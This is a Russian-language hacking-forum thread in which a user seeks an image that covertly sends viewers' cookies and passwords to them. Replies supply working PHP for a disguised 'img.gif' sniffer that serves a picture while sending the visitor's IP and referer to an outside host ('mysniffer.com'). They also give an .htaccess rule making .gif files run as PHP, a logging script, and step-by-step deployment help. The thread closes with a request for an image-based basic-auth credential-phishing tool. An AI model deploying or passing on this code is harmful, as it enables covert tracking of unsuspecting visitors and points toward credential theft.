Доброго времени суток, очень нужно реализовать подобную вещь: Пользователь открывает страницу с изображением (допустим аватаркой) при просмотре данного изображения, оно отправляет cookies данного пользователя на определенный email Использование сторонних скриптов на странице не прокатит, скрипт должен быть внедрен прямо в изображение В прочем многого то мне получать и не нужно (лишь ip, страница, где находилось изображение... Хотя от паролей бы не отказался.. но это уже лишь ради шалости )) ) Мучаюсь над этим вопросом уже 2й день, в интернете абсолютно ничего на эту тему нет... =-( Может быть существует некий сниффер, обрабатывающий избражение, которое находится на стороннем хосте, а не на самом сервере сниффера? Такое решение тоже подойдет Слышал про Img_Sniffcookgrab.exe , но так нигде найти не смог
элементарно. изображение - лишь часть веб-контента, с JScript можно и не такое. пассы снимаю не так. and no word anymore.
Есть подозрение что такое невозможно. (если только на картинку ссыль) Если есть возможность сослаться на скрипт который генерит картинку, то тогда можно Типа линеечек которые в подписи любят многие пихать, она генерится скриптом. ПыСы. А ещё интересно где тут реверсинг? ПыПыСы. Ну и кукисы разумееццо тоже, а вот ip юзера и страница откуда отрыли однако реально.
Извиняюсь, ошибся разделом Ну куки в принципе мне не так и нужны, мне нужно знать ip и реферрор, вроде видел подобеный код на php, но не знаю, как им воспользоваться...
Ну вот простецкий вариант. Скрипт img.gif, генерящий картинку PHP: <?php $im = imagecreatefromgif ('image.gif'); if ($im) { header ('Content-Type: image/gif'); imagegif ($im); imagedestroy ($im); $sock = fsockopen ('mysniffer.com', 80, $errno, $errstr, 30); if ($sock) { fwrite ($sock, "GET /sniff.php?ip=" . getenv ('REMOTE_ADDR') . "&referer=" . getenv ('HTTP_REFERER') . " HTTP/1.1\r\nHost: server.com\r\nConnection: close\r\n\r\n"); fclose ($sock); } } ?> Файл .htaccess для него Code: AddType application/x-httpd-php .gif Сам "сниффер" - sniff.php PHP: <?php $log = 'sniff.log'; if (!empty ($_GET)) { if (file_exists ($log) && is_writeable ($log)) file_put_contents ($log, $_SERVER['QUERY_STRING']); else echo 'File doesn\'t exist or not writeable'; } ?>
Если можно, то пожалуйста подробнее, как это использовать? Первый скрипт как я понял вставляется в файл .gif но где указать изображение, которое сгенерится? Затем создается файл .htaccess Куда его девать? sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?
Хех...это же элементарно. если хостинга нету. Регаешься тут ТАм тебе дадут ссылку на картинку такого вида www.сайт/userbars/img_4_4383.gif - её шлеш на почту и ждешь на сайте где регался логи. С той инфой которая тебе нужна.
Это элементарно, читайте внимательнее, в первом посте сказано, что есть лишь картинка, больше ничего... Мне не нужно никого ломать, для этого есть более подходящие способы Если и использовать сниффер, то только тот, что способен обработать левое изображение, т.е. не кидать ссылку пользователю (п.с. изображение будет вообще статично в сети интернет, ни кому оно передаваться не будет), а загрузить изображение на хост, и затем указать ссылку на это изображение в настройках сниффера, так, чтобы сниффер его обрабатывал. Но ни как не наоборот
akkolt, путь к картинке прописан в строке PHP: $im = imagecreatefromgif ('image.gif'); Картинка лежит рядом с файлом. Имя файла может быть любым (.GIF). .htaccess кладется также в тот же каталог, где лежит img.gif Именно так, только пути и урлы правильно в скриптах пропишите. И создайте пустой файл sniff.log рядом со сниффером с правами 0666.
то, что ситуация такова, что у меня нет возможности залить изображение на сниффер, могу лишь указать ссылку на нужное изображение в интернете
Аккольт,вот читаю твои посты и думаю,либо ты сам не знаешь что тебе надо,либо ты вобще впервые слышишь про пхп и т.п
если написать скрипт который выдаёт в загаловке Location: /image.png и при этом запоминает ip и реферера
полностью согласен картинка и скрипты должны находиться на том сайте на который заходит пользователь у которого ты хочешь получить ip и надо что бы картинка выполнярась как php код а так как файл .htaccess и php файлы на сервер где размещен сайт никак незальешь то у тебя и ничего неполучиться....
я тут немного вспомнил...непомню кто писал но вроде D_x nb бейсак идентификация в картинке которая грузится с удаленного сервера у кого такое осталось а то что то у меня полерялась